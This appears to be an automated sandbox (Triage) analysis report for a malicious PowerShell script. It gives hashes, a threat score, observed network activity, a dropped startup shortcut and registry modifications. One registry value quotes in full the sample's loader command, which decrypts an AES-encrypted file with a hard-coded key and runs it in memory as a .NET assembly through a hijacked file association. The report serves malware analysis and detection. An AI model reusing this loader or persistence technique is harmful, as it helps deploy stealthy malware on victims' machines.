c33f7334f8e7d0457c5205b38b7e8e8411725f74ac9b1b65247db3fcec3707e1 | Triage

Analysis

max time kernel
91s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 10:31

Sharing

Report Analysis Logs

General

Target

ctimcjg4e8wf95rzus5c35nh8e70fd0i.ps1
Size

878KB
MD5

af7f2bd24517894733344dacbdbbaf25
SHA1

ee5a694d2753e82d24f40a7fb635488d7811209a
SHA256

c33f7334f8e7d0457c5205b38b7e8e8411725f74ac9b1b65247db3fcec3707e1
SHA512

d61d867652a5a0f7b290a2f68ce49754060a71d2a56a093c99fe6e52993ad0c8cc716a0b3624c3f133f7fc570a5b1d258814be4b4f9bcc8a2d9ad3a3b07efcff
SSDEEP

24576:uHykUQyHP0Q40o49QT/u5zYZO30ImX/ftNgwT7q:opyv1PfFNA/l4

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

25 4684 powershell.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DLoSHgpRZGVqnaWKgSxXIcQ.lnk	powershell.exe

Modifies registry class 7 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\.RGejRmeunGnB\ = "vowiahaiucemqri"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\VOWIaHAiuceMqrI\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\VOWIaHAiuceMqrI	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\VOWIaHAiuceMqrI\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\VOWIaHAiuceMqrI\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\VOWIaHAiuceMqrI\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]255,197,72,222,124,12,5,108,46,176,21,72,78,25,15,43,43,149,61,238,68,52,41,125,115,112,65,223,172,28,133,194);$A.IV=@([byte]1,8,167,0,223,219,181,123,202,151,254,193,9,123,138,23);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\pVKyKyASwJll.RGejRmeunGnB'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[YC867ZzH6h3ozC23QW5ogKq5OjastrzaM4EX01duB.klxq08iGfRlDnIXfDmph8VaLJfz8OMJr6p0jXYAWqKMWf36hNn1U1Z9I0]::MfelXThFHD2BgS3xv0wiuFkybGIapwv9G44dMW0MODskwNwkUhAwMyXIBgrb502GZXM();\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\.RGejRmeunGnB	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4684 powershell.exe
4684 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4684 powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ctimcjg4e8wf95rzus5c35nh8e70fd0i.ps1
1⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4684-132-0x000001583F840000-0x000001583F862000-memory.dmp

Filesize
136KB

Download
memory/4684-133-0x00007FFAB6DA0000-0x00007FFAB7861000-memory.dmp

Filesize
10.8MB

Download
memory/4684-134-0x00007FFAB6DA0000-0x00007FFAB7861000-memory.dmp

Filesize
10.8MB

Download